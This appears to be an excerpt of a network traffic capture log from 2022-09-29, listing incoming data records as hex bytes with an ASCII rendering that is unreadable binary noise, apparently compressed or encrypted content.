                                                                                                                                                    2022-09-29 12:59:08 UTC12760INData Raw: 37 6f d7 f6 03 25 59 97 f6 df 26 9f 11 92 63 bc 69 b9 9c 1a 92 1e ab f4 cf 1f 48 3a 4e 33 32 5d 89 70 47 09 24 59 b1 ec e1 a4 f4 02 0d d3 11 15 8b bd 6a 0f bd 1c b5 98 03 74 e0 d1 fe 62 72 fc 97 ee 51 6f db ae fa b6 7f fb 38 71 a2 5a d7 11 bc 22 c2 37 c0 03 4b 17 48 f9 58 86 46 d6 57 2a 6b 93 96 d4 6e 24 5e ce d0 9b cb 4f ec 24 61 5d b9 4d 78 d8 77 38 23 b1 e7 d7 67 5f 5a 1a 7d d0 98 e4 e2 a0 67 c3 bc c3 5b 23 5f d4 cd 39 11 1b df 6c 5d 2f f4 cc c8 6b 30 4a c4 0b 12 18 ff 20 23 69 f5 d1 b5 24 e2 f5 6c 1f 0e 32 6f 1d 0a 1f 3e 73 b4 87 97 4d d7 13 65 04 40 a0 11 19 98 21 da 9b 1c 02 b0 18 79 00 db 79 c5 a6 bf 0c 37 14 8a 1a ae 64 b5 57 09 e0 a1 cf ac 4b 10 76 15 c3 9e be 32 cf b9 17 30 e5 08 24 99 bb 1b af 4e 07 2f 81 76 b4 7f 91 6b 32 53 5c c1 17 ee 2f 05
                                                                                                                                                    Data Ascii: 7o%Y&ciH:N32]pG$YjtbrQo8qZ"7KHXFW*kn$^O$a]Mxw8#g_Z}g[#_9l]/k0J #i$l2o>sMe@!yy7dWKv20$N/vk2S\/
                                                                                                                                                    2022-09-29 12:59:08 UTC12776INData Raw: 9f 2b 67 55 06 3c 99 c2 71 80 16 1c f4 2a df 2b d7 ed 7e 5c ac 3e 5f f7 28 84 e4 4f 55 f3 96 f8 70 18 4f 40 b3 5f 88 66 52 1f aa 25 5f 8a a9 55 ea e5 a3 76 3b 2d 7a 87 cc 0f 43 1f 97 d3 36 83 a3 6d b4 64 7f 3a 04 5e e6 21 33 e3 9e fe 9c 84 14 a2 71 30 ce 01 cf b8 c2 bf 0d 8a 14 b8 b3 bb 83 32 a4 cf 78 a1 ce 9f 2c 70 d7 7e a7 a8 d3 2a ea 29 be 52 e6 ee be 96 87 6c df cb 58 2d 94 72 ae 0e 43 f2 bc b2 70 cd c3 d2 f4 50 e6 17 bf ef 7c b7 22 ec 1a 18 90 7d 46 05 0a bb eb 92 c7 42 be 0e 88 4e 22 7e 0d 66 58 59 49 72 cf 89 7d 29 78 95 dc 47 72 20 21 8f 65 a0 ec 7e a0 d3 f0 13 c3 b2 d6 e8 93 0b e1 3c 32 28 9a 18 23 e6 23 cc 9c 7c 5b de 9a 18 50 b4 56 a1 27 1a a1 33 eb ed e5 fc 2f d6 c9 73 b6 5b 21 b3 bc dc a0 4a 72 29 a6 3b 1b 11 53 c5 04 c2 cb 2b 38 f7 f4 45 8e
                                                                                                                                                    Data Ascii: +gU<q*+~\>_(OUpO@_fR%_Uv;-zC6md:^!3q02x,p~*)RlX-rCpP|"}FBN"~fXYIr})xGr !e~<2(##|[PV'3/s[!Jr);S+8E
                                                                                                                                                    2022-09-29 12:59:08 UTC12792INData Raw: a4 92 1d 00 8f 8c 7d d8 5b aa 66 6a 74 f0 13 ee 26 6d 80 7e 5f 5c e4 6d 9f f5 8d 92 ad b4 7c 5f d0 7f 97 28 21 99 b7 15 22 cc 1f 1f 4f e6 cf 79 b6 10 19 03 69 34 e5 6c 79 7b 22 27 4b 90 08 4a d4 86 b2 6c 0a 01 2f b3 c5 38 60 69 76 74 ad 79 3c 35 de e0 55 a7 4f af 48 38 ec bd 37 4c 9c be 33 3e 0f ef c4 bd 4f b5 79 55 a5 2d ce b6 b3 e4 8e 97 29 4f d2 a1 3a 53 33 3c a7 5d 3d a5 fb 9c 27 b5 28 a1 cf c7 45 37 a9 3b 48 41 3d dc dc 00 0e b0 07 f8 e2 17 56 19 0f dc c4 0a c8 7d 0e 44 a2 da 33 3d 53 bf 69 a8 8d 39 8b 70 0e f0 8c 0c 2a 34 c3 0d 58 82 58 60 8e 77 4d 8a 40 87 46 53 2e d1 7d 52 5b 45 c3 ef 13 c2 d6 aa 00 5b 8c c8 04 5a df fb c1 e8 e9 3c 8b bd 6a 1e 10 cf de 3e 9a ae f5 15 23 fc 6e 60 93 f0 dc 2b d6 0d 5d 0f e6 48 66 0f 4a 00 5c cb 1f 2e bb 47 9c 2c 26
                                                                                                                                                    Data Ascii: }[fjt&m~_\m|_(!"Oyi4ly{"'KJl/8`ivty<5UOH87L3>OyU-)O:S3<]='(E7;HA=V}D3=Si9p*4XX`wM@FS.}R[E[Z<j>#n`+]HfJ\.G,&
                                                                                                                                                    2022-09-29 12:59:08 UTC12808INData Raw: 0c fc fd 5a 5c 0f 9c 4a 48 52 f0 e1 80 5a df c1 22 15 50 d0 c6 be 3b 64 7e c1 e8 52 e2 7c 00 81 c4 ce f2 a0 4e a7 18 5b 2e a8 9d e4 66 0d f5 b6 92 0e 24 86 9d b5 ec 12 f9 f4 0b bb 19 a2 e4 80 57 ae 7e 0c 4d 59 d8 15 66 e2 3b f9 27 11 71 84 26 f3 86 82 e7 26 80 07 85 18 31 98 a7 94 88 a7 65 c1 e4 fe 03 0e 93 d5 1f 77 27 8d 5f 47 18 70 31 34 a6 6f 7e 49 96 c5 b2 4e 05 f3 97 66 39 43 02 dd 96 87 fa 0d 75 8a 48 60 ff fb 43 93 26 a4 32 df f3 8a b5 05 28 41 c2 97 c2 90 3d 0c 14 e4 88 39 dc c9 ce a3 ab 4f 91 d6 27 e4 b6 94 79 fc a4 60 fa c5 dc 62 c8 4d 92 12 b4 f4 9d c4 8e 06 c6 ec fb 65 7b 17 ca 8d 8b 9e a9 01 b5 5c 5d a3 1e 34 25 8b 89 79 87 70 4c db 96 43 d3 ab 7c 7b 75 9b 9c e0 54 ff 70 89 85 37 f6 3a 5c c1 50 fb 85 b7 87 1c 15 e6 13 0d 3d ee 09 8a e0 2a d4
                                                                                                                                                    Data Ascii: Z\JHRZ"P;d~R|N[.f$W~MYf;'q&&1ew'_Gp14o~INf9CuH`C&2(A=9O'y`bMe{\]4%ypLC|{uTp7:\P=*
                                                                                                                                                    2022-09-29 12:59:08 UTC12824INData Raw: 5f c8 d6 11 b5 52 a3 b8 49 1d ba f6 c0 16 e5 06 e0 2e f2 0d ea 01 b9 08 cc 3f bd 9e 84 47 f9 50 b1 05 d2 68 e2 25 91 3d a4 6c c5 42 1d f3 e5 67 f6 17 1e 81 f7 85 e1 63 7f b1 8f 75 09 63 26 02 98 b4 6e ea 2a e7 3b b1 15 e7 d8 ae 92 55 cf d4 21 d2 8b 38 d3 e1 3f a0 31 4e b7 a4 09 b8 b2 68 f8 21 5d cc 35 aa e7 a2 90 39 d0 22 88 30 29 79 55 2f 49 40 11 0f 5f a6 f1 5d 50 0b 16 f1 43 39 a1 8e 08 10 2b 6c ed 60 25 33 41 4b 2e 36 f4 50 2d cb ae 75 ac e8 27 34 79 a1 3b 32 97 4a bf 73 b6 a4 67 0c 34 db a1 d8 e8 04 65 ca 0c 39 96 be 2c d8 36 6b f8 94 9e ed 81 b7 c9 b5 06 e5 6a 61 78 cf 53 0c 28 e0 3c a2 61 36 c7 82 a2 c0 d6 95 61 7a 11 de fd 0c 17 41 13 5f 6a 9d c6 5c 2d 86 e0 2c 8f 3e 80 2d 06 0e 14 c3 46 33 01 f1 2d 1b 2b 6a ed fd 08 33 26 eb 10 f2 1e 6c 8a 64 27
                                                                                                                                                    Data Ascii: _RI.?GPh%=lBgcuc&n*;U!8?1Nh!]59"0)yU/I@_]PC9+l`%3AK.6P-u'4y;2Jsg4e9,6kjaxS(<a6azA_j\-,>-F3-+j3&ld'
                                                                                                                                                    2022-09-29 12:59:08 UTC12840INData Raw: dd dd 8f a6 a5 97 ef 85 c3 91 e4 e1 5f 08 f0 75 c6 b3 65 9f b8 6b bf cd 49 37 8b 71 ed de 4a 0a bc ba fb 14 cf ac a6 08 6d 5c 75 ae dd d1 00 67 17 c0 8a d6 74 06 2b 34 d6 39 92 69 3d f3 06 af 19 14 d4 22 ad 9e 0e fb f0 15 ee 0d b2 7d 45 01 ea 6d 84 73 8a 52 c7 8e 0b b0 eb 62 55 26 55 17 49 4b ac 38 e7 1f 58 e8 ad 2f c3 29 16 55 38 8d 54 50 97 d4 d1 61 b6 f2 41 75 85 d4 48 b3 56 ec e5 df bb fc 7e 4b 81 9a 32 c1 56 64 35 69 ef 3a 37 d7 f3 ae fb 73 62 33 88 e4 b7 f4 28 d0 8f ec ea 5e fb a4 5b 99 f3 fa 1b 41 cd c5 56 ba 0c 5e 90 45 b5 80 27 dd b9 df cf 02 23 a9 0b 79 21 17 30 81 b0 b1 fa 2a ff a5 1a bc 34 3c d2 44 27 5d 31 e0 6a f7 07 69 9c 54 52 df a5 11 fc 7c 9e e4 89 be 72 ce b4 78 d2 7d 0d 3e bb 57 25 48 28 be 2b d5 6d b8 8e 60 98 96 f1 a1 61 4c e8 8e f3
                                                                                                                                                    Data Ascii: _uekI7qJm\ugt+49i="}EmsRbU&UIK8X/)U8TPaAuHV~K2Vd5i:7sb3(^[AV^E'#y!0*4<D']1jiTR|rx}>W%H(+m`aL
                                                                                                                                                    2022-09-29 12:59:08 UTC12856INData Raw: 76 3e b3 e4 b7 8c 87 3b 78 f8 02 e1 3d 2d 6a 5a a6 58 5b 9b 0e f5 53 a0 e0 41 3d b7 41 0f da 33 56 9d c1 30 94 8e 7c 0e 8b ae cc d2 a1 7a 79 33 90 b1 b9 a1 35 54 e1 84 de 21 b8 b1 85 45 7c 5c ca 90 92 99 f7 54 fc 88 3a 02 20 d3 68 b2 fe b8 26 4a 4a 3e 8e f6 d0 33 4d b9 2c 12 d0 27 71 30 dc c8 83 87 e0 ac d8 c1 00 db f0 1b 5c c3 83 3d a2 04 51 ba 91 3b a6 f7 5d 89 be aa 25 bf 2b 8e e1 da e4 b5 9b 1d 33 1b 06 e9 f1 e3 16 d6 47 27 f2 6d 01 05 cc f6 b3 11 74 8f 74 a4 92 ce 41 7b 51 1e c1 a1 cc e3 75 70 c3 b9 d9 a4 7a dc 53 33 87 9a 66 5e ab 2f 7f 5b 6b 88 5b 92 10 cd 7b 60 2e cd d7 f7 88 6f 58 df 2d e8 8d 67 68 ce b0 20 b2 e4 33 e4 94 29 ae c0 2a 2c 50 52 39 0c 20 7f 42 8d a0 9d 09 8e f3 f5 d4 c6 9e a3 39 7c b9 b0 a4 08 54 06 57 7a d0 20 d6 1f 66 31 4c fb ea
                                                                                                                                                    Data Ascii: v>;x=-jZX[SA=A3V0|zy35T!E|\T: h&JJ>3M,'q0\=Q;]%+3G'mttA{QupzS3f^/[k[{`.oX-gh 3)*,PR9 B9|TWz f1L
                                                                                                                                                    2022-09-29 12:59:08 UTC12872INData Raw: 67 c7 82 fa ef 47 26 ca d9 41 5b 1a 5c 73 16 e6 48 29 7a 37 02 ba 23 c0 57 27 53 81 17 bd 26 cf 8f a4 0e 50 bc 9f ad 88 22 59 7b ad 15 75 a7 3c 66 77 91 9d 21 18 60 63 41 6a 4e 57 11 c2 85 06 87 44 1b c8 a3 34 47 eb b9 9f 46 e5 ee 44 9d dc 3a 33 62 e3 30 32 79 8f 7b 72 1e 7e 12 c4 2c 23 32 a2 ec f9 21 ce 04 3a 42 24 9b 01 14 3a c0 a2 d0 44 0e c3 ed 2e 4b f2 05 4c 13 f0 9e d8 90 4c 76 58 78 38 ac 6f e6 d3 2e ee b6 f4 28 ed 3e 1c 80 b6 46 e9 18 3a 34 95 e0 70 1b b1 85 b2 cb 67 31 58 c8 cb b9 f5 73 d6 2f 34 f1 af 49 df ee 18 2a e3 85 61 eb 7c ed 63 d6 ea dd b8 00 9c ee 8c 84 be 61 a1 38 84 59 59 e9 83 16 c5 5b a9 24 29 9c f0 6d 62 ee 4e 8b 74 94 ea 8e 07 c8 be 69 cc 17 af 9e 06 49 bb 64 90 77 59 c6 0d dd 4f ce 8c cc 37 ca 73 74 9c 4a cf 5b 72 12 06 2d 70 df
                                                                                                                                                    Data Ascii: gG&A[\sH)z7#W'S&P"Y{u<fw!`cAjNWD4GFD:3b02y{r~,#2!:B$:D.KLLvXx8o.(>F:4pg1Xs/4I*a|ca8YY[$)mbNtiIdwYO7stJ[r-p
                                                                                                                                                    2022-09-29 12:59:08 UTC12888INData Raw: b6 5a e1 ef 65 e6 7b e3 7c 31 05 10 f7 36 be 6c 6b 14 e5 67 76 d5 74 64 de 9f ad 6e 5d a5 b1 ac 48 9b 28 f9 1e ea 21 91 eb c5 31 f9 cc b4 2f 01 cf fe 79 6e 3c 54 ae 4e 8d e7 6a 7a 71 ed 78 24 4d fa 48 76 6c 03 28 3d 77 ad 07 6c 06 78 30 8c c3 48 ab a6 98 02 80 4b b9 eb ed 73 14 e0 4d 9f 54 08 45 d8 d0 33 59 08 9a 48 14 99 c2 9a 8b 53 cc e7 29 fa 6d 25 e4 c8 ad 03 41 a8 7d f0 de 35 ba 6d 90 dd ec a1 20 a5 34 89 fc 18 ae 68 b2 43 66 bb 46 0e f9 0b 53 b2 dd 79 48 a0 56 4a a6 fe 5b dd cd e1 2a 6d 9a 31 0b 01 54 10 fc 21 2a 8c 20 b9 5c 5a 2c 15 ea 73 1f 16 f0 29 bd fd a1 cc 67 39 d2 e4 87 67 42 52 88 6f 09 02 8d 76 0e 97 07 38 78 6e 29 5f 74 d4 ee 4b 46 a3 69 43 89 6c ca 5b 6c bc e7 b6 a3 3a 63 a1 7e 04 e4 f6 b0 55 b1 d1 6c e2 b3 12 e3 5f c2 d1 ce 3f 3b 72 db
                                                                                                                                                    Data Ascii: Ze{|16lkgvtdn]H(!1/yn<TNjzqx$MHvl(=wlx0HKsMTE3YHS)m%A}5m 4hCfFSyHVJ[*m1T!* \Z,s)g9gBRov8xn)_tKFiCl[l:c~Ul_?;r
                                                                                                                                                    2022-09-29 12:59:08 UTC12898INData Raw: db cd 2e 87 1a ad 3c 66 15 ca d9 2d dc 18 97 da 19 bd 7f 45 1b c1 57 2f 85 1a 40 fc 7e a8 40 b9 47 c6 3a c1 f8 35 4f db 07 8a 40 04 77 e5 79 e5 a5 6b e7 56 ff 2f c5 0e 09 74 4a 12 7c 8d 5e 39 7b 85 db 6f 9e 0e 64 4b 56 5c cc 00 40 05 ad 8e 13 69 4f 0b 37 7b b0 1e e3 5f 85 b6 6f c8 ad 59 30 8d 38 4c fe b0 40 38 06 9f 84 2c 4a c0 c0 92 7f e0 7c dc 4e 07 5a 01 4a 2a e1 d8 7a fe 98 13 d0 59 d6 05 e5 e9 b0 c0 17 76 c0 7d 84 ee 5c 86 2f 76 6b 17 6e 8d 7e a2 b5 31 89 0a 6b f4 cf 2e 08 a8 d5 c9 04 61 64 c4 1b c0 78 b2 35 a0 5f 71 ed f9 01 8a 71 af 3c 19 5f e2 43 31 10 a7 47 e3 99 ef 44 ec a0 10 b6 26 58 c9 79 b3 06 56 e8 b3 64 ef f6 68 9c 66 10 07 06 fb 2d c5 3b bf 37 bf 92 71 34 36 e2 cd 65 3a ec ea f5 56 c8 4a bb 44 d2 1c 4c 29 d1 35 a3 14 22 0d d1 f9 62 40 ef
                                                                                                                                                    Data Ascii: .<f-EW/@~@G:5O@wykV/tJ|^9{odKV\@iO7{_oY08L@8,J|NZJ*zYv}\/vkn~1k.adx5_qq<_C1GD&XyVdhf-;7q46e:VJDL)5"b@
                                                                                                                                                    2022-09-29 12:59:08 UTC12914INData Raw: a7 57 d1 86 b7 73 66 6c 35 4e 80 d1 83 00 e2 8c 1b 54 32 5e 44 8b 61 c2 ba ad 96 a2 a5 69 bd 4f ac ca b4 b0 4e 29 dc 49 f0 1d 6a 17 52 7e 01 30 6f b7 c5 1c a9 48 43 a8 88 ed fc e6 53 01 41 df 28 a7 0e 3f 34 d9 4d b9 a6 ae d7 07 db b9 17 a3 3c 35 8a 11 f2 4a d0 c2 65 0d 06 4d 26 11 f2 32 ef eb fd 4a 19 a8 80 1c b2 25 7f 56 00 f9 3e ca c7 f6 76 c0 67 47 1f 02 ff fb 1b 8a 31 fd 4e f7 1d 6d 57 4b 53 17 9b c1 0f d3 ab a0 8a 60 d8 4a 90 ae d0 f6 63 6e b4 24 48 e1 cb 6a 6e 55 ca ed d6 4c c4 75 4b 11 01 e6 7a ef 2a 19 ba 7b b3 d6 99 c9 29 f2 16 a6 8f 0f fc c8 c9 83 0d b1 45 28 84 3c b4 28 61 63 5b f3 12 89 01 21 92 8e 08 cf 81 3d 60 aa fb 00 c2 a9 51 ab a3 53 0a c2 02 bc d6 eb 4d 58 16 d0 16 54 f6 2a ac 26 6c 59 6a 21 ed ba ed 7b 14 eb 02 41 e4 76 39 93 49 7a 61
                                                                                                                                                    Data Ascii: Wsfl5NT2^DaiON)IjR~0oHCSA(?4M<5JeM&2J%V>vgG1NmWKS`Jcn$HjnULuKz*{)E(<(ac[!=`QSMXT*&lYj!{Av9Iza
                                                                                                                                                    2022-09-29 12:59:08 UTC12930INData Raw: 4e 96 29 83 42 a5 df 6d 42 42 25 bc 32 e1 ec 15 d3 fc ad 41 1e 71 73 be 5b 77 75 7d 15 e4 55 e1 cc d7 b1 ca 2e b5 7c c5 ba 5c 84 04 b5 29 76 bd 42 dc 67 eb 65 c1 f7 a6 ec 80 92 e2 87 63 03 11 df 9f e8 03 13 85 2a 00 b0 96 d5 08 8c 02 ce 8a b6 91 83 96 49 fe 5e c4 60 53 64 0a 8c 9e 4c ea 9f af 0d 28 51 56 f6 46 bb cb 8e 5e c2 6a 48 9f 26 ba 35 34 44 6e ac 40 ca 2e a6 ce 1c a8 fa 4e b6 6c 84 b7 3b 6d 20 e2 f0 1c 60 71 df d7 04 93 5e e0 ce 1a 94 2b 6b 32 4e 65 7e 49 f6 68 07 50 9d e1 91 b4 26 c4 00 5e 8e bc 42 a3 d4 3b a6 29 11 50 e7 24 45 67 19 4f ef cd bd 2d c6 b6 93 57 e3 04 6b ea bb 2a ee d9 b8 b8 20 b8 d3 51 97 3f c3 c5 32 e1 2f 60 04 db a9 92 5b ab 2a ff 95 5e c3 6c 9b 62 53 79 e2 be 18 60 3a 33 54 b1 4f 47 80 95 18 d7 a4 ae 0d 97 88 fb c6 de 53 18 26
                                                                                                                                                    Data Ascii: N)BmBB%2Aqs[wu}U.|\)vBgec*I^`SdL(QVF^jH&54Dn@.Nl;m `q^+k2Ne~IhP&^B;)P$EgO-Wk* Q?2/`[*^lbSy`:3TOGS&
                                                                                                                                                    2022-09-29 12:59:08 UTC12946INData Raw: 2c ef 83 05 7f cf f4 dd f6 ce 9a a0 97 b7 43 eb bf 93 e1 e6 6d 02 87 8c 42 c7 7e 6c e9 14 7f 28 17 fb 4a ce 6f 07 af a8 43 9b 5d 6b a1 5d da 87 82 f8 da 92 9f a7 ec 45 09 c9 14 bb a7 ff df 9b 63 3f 63 74 05 b6 af df 4b 57 c9 40 ab cf ad a5 09 80 33 24 ca d2 0d 7f 54 3f 2f 68 5e 87 dc 80 17 3d aa 7b 16 7d c4 52 f7 b2 c8 4a 3c d4 54 ab 9c c7 49 42 92 87 7a 4e 45 90 e7 05 bc 00 00 8e 53 a9 b3 26 69 37 26 35 20 ed 78 b1 f9 26 06 09 1e da ed 1c c9 be 53 8e a7 35 bc d3 94 35 02 e6 34 88 cf 47 ba 3a 05 56 67 ac db e3 ad a1 c0 50 7a 38 55 06 4f 7c da 4d 2c 80 9e 77 bb d8 43 61 47 e3 78 c6 d2 0e 2a 8b 89 84 fc 45 5f 55 e1 45 53 38 eb 21 3e 7a 7d 27 ba b3 52 68 20 c9 f1 af fb 63 42 db 13 ef 8f 24 7a 46 5c 84 70 52 08 15 8a 1f b9 2f bc 9a 0e 79 d0 a6 8f 8d a5 b4 6a
                                                                                                                                                    Data Ascii: ,CmB~l(JoC]k]Ec?ctKW@3$T?/h^={}RJ<TIBzNES&i7&5 x&S554G:VgPz8UO|M,wCaGx*E_UES8!>z}'Rh cB$zF\pR/yj
                                                                                                                                                    2022-09-29 12:59:08 UTC12962INData Raw: 20 79 e8 bf 3a 4d 75 f8 db 92 b2 34 10 c8 7c da 75 60 a0 7c ce 23 3c 27 17 50 8b e9 8b 66 be e4 08 5b 7c 8a a7 25 46 4f 70 66 9f 51 32 5e 47 7f 71 4d 31 2f b6 b3 f7 a4 67 07 f9 81 24 f4 14 24 ed 18 d1 4f 05 da 23 43 e6 ba 4f 46 39 be 65 ae 66 eb 4f ed 27 d5 4e b3 90 8a 77 94 85 af b6 fe 7f b2 24 42 e8 87 94 e6 d5 99 b1 6d 79 59 eb b7 ec b7 8d 59 ea 18 40 b8 70 1e e1 8a 60 6d 03 d7 2a 37 7e 68 fa 65 e2 48 64 de 89 ce d0 29 74 03 0e 7a 0f c3 79 e3 10 1a 3a 95 14 f3 00 d2 e3 68 cb b8 2a 1a f5 41 23 59 b9 e6 c4 31 9d 57 a5 52 96 d6 79 35 b1 55 dc e0 65 c4 99 4e e3 54 a9 cf c4 0c 71 b2 9c f6 de 9b db 4b b3 5e 30 7f ec df 7d 11 e6 e3 fb 88 bc be d6 bc 61 9a 72 a1 ba 68 46 1b 9e b1 18 48 39 10 92 18 8c 0b b1 ed 57 85 2a d3 f7 55 57 da 0e 53 09 db 99 e6 d2 40 0f
                                                                                                                                                    Data Ascii: y:Mu4|u`|#<'Pf[|%FOpfQ2^GqM1/g$$O#COF9efO'Nw$BmyYY@p`m*7~heHd)tzy:h*A#Y1WRy5UeNTqK^0}arhFH9W*UWS@
                                                                                                                                                    2022-09-29 12:59:08 UTC12978INData Raw: 14 05 a9 bb f7 7f 5e a0 a0 ac a1 96 f8 02 15 dd a5 d7 1e 29 39 80 75 7c 28 f4 b1 44 e9 91 13 f6 c8 82 b4 4f 9b c5 0d b3 54 94 a8 d6 d5 8d e9 1f f0 36 8b 48 87 f9 ad c5 29 fb 83 d9 af 19 90 47 de 11 73 8f 1f e2 9f d5 85 12 71 5a ac 00 80 cb 9a 70 6b 71 43 42 45 b5 ee e4 cb 20 8e 5b 73 0c be fa dc bb 80 36 b8 0c b2 ba a4 14 f3 8c f4 a2 57 1d a4 ee 2c 6f 84 f4 bb 64 d6 07 8e 60 e7 20 6b 27 3e ff b1 54 4a 41 bd 53 f0 02 df 20 a0 ae 6d 11 14 5d a8 f5 b5 46 b6 c9 e7 19 ec ac 54 de c7 e1 97 dd 78 2f 3e 92 76 3d 3c a5 ce c4 49 b7 0f 1d b7 6c 92 7d 60 8f cd 52 9a a5 c9 a7 31 b2 01 84 34 1d 46 b3 44 0f fb 21 de 52 6f 95 e2 09 ad cb 03 c9 30 e8 68 17 57 95 8d 0e 7b 5a 73 f4 7a 49 14 e5 81 85 88 83 67 f2 c2 dc a9 c5 19 f0 27 39 d6 4b 98 bf 0e a3 8d f6 f6 d1 5e 9f 02
                                                                                                                                                    Data Ascii: ^)9u|(DOT6H)GsqZpkqCBE [s6W,od` k'>TJAS m]FTx/>v=<Il}`R14FD!Ro0hW{ZszIg'9K^
                                                                                                                                                    2022-09-29 12:59:08 UTC12994INData Raw: 49 13 0d 67 8c cb b1 7d 2d 6a d9 4a ff 89 6f 97 66 1b 0d 64 18 77 20 19 9f 2e e9 d7 41 46 d1 a8 4e 53 f2 bd ee c5 24 ac f7 c1 04 64 ec 06 24 b0 c2 3b 00 b2 e1 ae 8e 55 17 9a bf f6 c8 bd e6 fc ed 12 15 10 13 20 3a 85 ba ef bf 91 6c ea 5f 95 b4 5a 48 3c a3 67 3a 1a 7c f1 e3 b3 b3 76 08 34 d2 31 e4 e5 f2 c3 44 e2 78 7b a3 39 8e 0f 55 1c 02 89 35 c1 a9 b3 73 a8 ee 30 84 1a ec 17 80 32 c3 2b a0 c3 8c f6 ab 3e e5 b4 1f 83 45 c8 4d a9 61 a4 63 9a 53 a2 d2 c5 0a fc 2b 1a 26 19 b7 4a 75 38 07 8c ad 94 9f bf 26 49 56 23 d8 4d c1 e0 32 2f 38 3c fc e4 b3 f1 9e 52 b2 f1 62 63 d5 c7 6c b5 10 3a fa 0a 58 f6 10 28 06 7f 83 bd bf b0 c7 46 ec d9 75 75 9c fc d8 12 2c 09 ab e0 78 c7 58 bf 21 c5 68 bb e1 5a cb 3f 7d c4 81 aa e3 b4 d5 43 a6 21 1d 58 a4 6e 14 ca 72 d6 06 4f 8c
                                                                                                                                                    Data Ascii: Ig}-jJofdw .AFNS$d$;U :l_ZH<g:|v41Dx{9U5s02+>EMacS+&Ju8&IV#M2/8<Rbcl:X(Fuu,xX!hZ?}C!XnrO
                                                                                                                                                    2022-09-29 12:59:08 UTC13010INData Raw: f1 88 2e 15 b8 5e 91 6b 31 5c 2f 93 c5 a7 6c b1 6e cb 8b ee 00 15 dd f4 5c 2c b4 ba 39 fd 1c 68 e5 8b 6c f5 55 dc c1 2e de 74 a2 64 ca af 6f 0e 72 79 86 3b 31 b4 eb 7c ca 65 c7 6a ce 22 db e0 ca 62 5f 75 b4 b1 52 20 10 2b 9b d7 e2 1c 57 c4 91 1b af 3b 1a da 5f 20 8a f2 45 fb b8 cb 1f 81 d3 0b 69 4c aa a0 9f ea 6e 5e 6e 76 36 07 d9 f0 98 51 6b 0f 76 98 b2 36 30 91 a3 7f 98 8d 1d 7f 8c d1 32 25 db 79 f7 9a 79 bb 85 c5 dc 9b af 56 ef 28 3a 07 b8 d2 8c 82 2a 64 1c 0e b6 5a c3 57 ac 0c 44 65 bc 10 47 cd 50 ed df 16 bb d8 37 80 40 1f 99 c8 06 6c 6b 6b a4 7d 25 4e 89 de 2c 22 41 5f f3 1a 9d c6 2f e8 64 62 b8 3d f5 42 4d d6 bc d1 22 1a c8 8e fb 7b 2c d4 19 7a 1a 56 68 7e 81 16 c5 43 3f d6 63 a4 d0 ca 76 8e 0f c0 60 5d d5 4d 0f 57 ef 90 79 23 04 cb 2f 14 55 e3 ed
                                                                                                                                                    Data Ascii: .^k1\/ln\,9hlU.tdory;1|ej"b_uR +W;_ EiLn^nv6Qkv602%yyV(:*dZWDeGP7@lkk}%N,"A_/db=BM"{,zVh~C?cv`]MWy#/U
                                                                                                                                                    2022-09-29 12:59:08 UTC13026INData Raw: 28 72 8d 22 d9 e6 36 05 c6 1e db e7 a3 fd d2 dd 06 b2 6a 9a 67 71 2c 9c ba e2 2a 9b 3f 26 53 6e e3 c2 11 2b 5f 2b 62 37 d6 30 60 32 cc bf f4 e7 b4 11 d9 7f 35 bb 5f 9d 7b 81 42 9b ab 8c 38 7c 4e 2e f1 76 82 22 82 f9 3c a5 7d 8e bd 71 8c 34 02 8e 61 e7 48 14 24 eb 6f f2 95 66 61 c3 dc d6 64 ed b5 2c 4a 9b e5 3f d1 44 26 e2 24 c6 cd ba 36 30 82 d4 14 9f 6a b6 85 8a 97 89 0f 90 9c 06 11 fc df 68 68 07 6b 5f ec fa a6 27 ce 23 bf e0 7a cb d1 23 fa f9 36 d3 28 92 16 b5 91 e4 44 36 79 24 7d b7 0c f8 81 af cf 0d 3c 32 42 b3 a7 cd b6 78 fa 58 8c ef 48 78 b1 f9 0c a4 ad 36 d6 cc a4 b1 8d b6 52 38 a1 e6 3f b7 6b 2d a4 ee 68 a7 9c 3f 02 10 50 3f 44 32 f8 1c ae f0 5f 33 e5 10 84 26 b7 f0 92 80 2e e8 1a 52 79 86 ec 61 b5 5a 09 c7 74 e3 25 93 64 bd a4 b7 04 ae f6 81 24
                                                                                                                                                    Data Ascii: (r"6jgq,*?&Sn+_+b70`25_{B8|N.v"<}q4aH$ofad,J?D&$60jhhk_'#z#6(D6y$}<2BxXHx6R8?k-h?P?D2_3&.RyaZt%d$
                                                                                                                                                    2022-09-29 12:59:08 UTC13042INData Raw: 16 3e b8 1c 81 57 c8 c6 66 0e d5 79 fe 7f ac ea cb af 76 1f f6 bd dd 90 be eb f6 2b fd 67 7b 23 79 ec 31 7b a5 1d b0 59 ad 33 c1 7a 7e b9 54 9a 72 51 95 13 48 0f d6 9c 42 1a 2f 71 3d 80 01 68 56 d5 62 57 64 83 83 bb b9 b8 fd 04 5c 83 7e 83 32 ce 13 e2 d6 39 fe ee 9d 5a 89 b4 20 89 1c 5a f2 5c cf fc 00 18 ea 92 09 ff fc fe 0d 3a 4b 27 20 be c2 f3 57 19 97 b7 62 a4 00 a1 9b 27 89 83 35 34 57 a3 d5 c8 46 5e dd 21 45 f3 53 7e 99 12 21 8e 88 d0 c3 e6 f1 78 c0 41 bc a1 b2 dc 94 d8 00 f8 87 17 ae aa 82 fd 44 21 cb 76 cf 16 ac 8f 3c 99 19 a4 f1 ea e2 ad 64 7d 56 f9 d0 ce 2a d3 99 3f 2e 59 e2 17 27 0f f5 82 56 77 89 5a 20 93 b5 ff d7 53 21 4e 24 6c c8 8e 4f 2a 9e be bf 92 b5 d8 d4 69 e2 a3 7f 99 c2 2b c7 74 a9 d9 00 26 58 ad 97 c7 21 5b 09 bb 88 23 9f 14 ac 53 17
                                                                                                                                                    Data Ascii: >Wfyv+g{#y1{Y3z~TrQHB/q=hVbWd\~29Z Z\:K' Wb'54WF^!ES~!xAD!v<d}V*?.Y'VwZ S!N$lO*i+t&X![#S
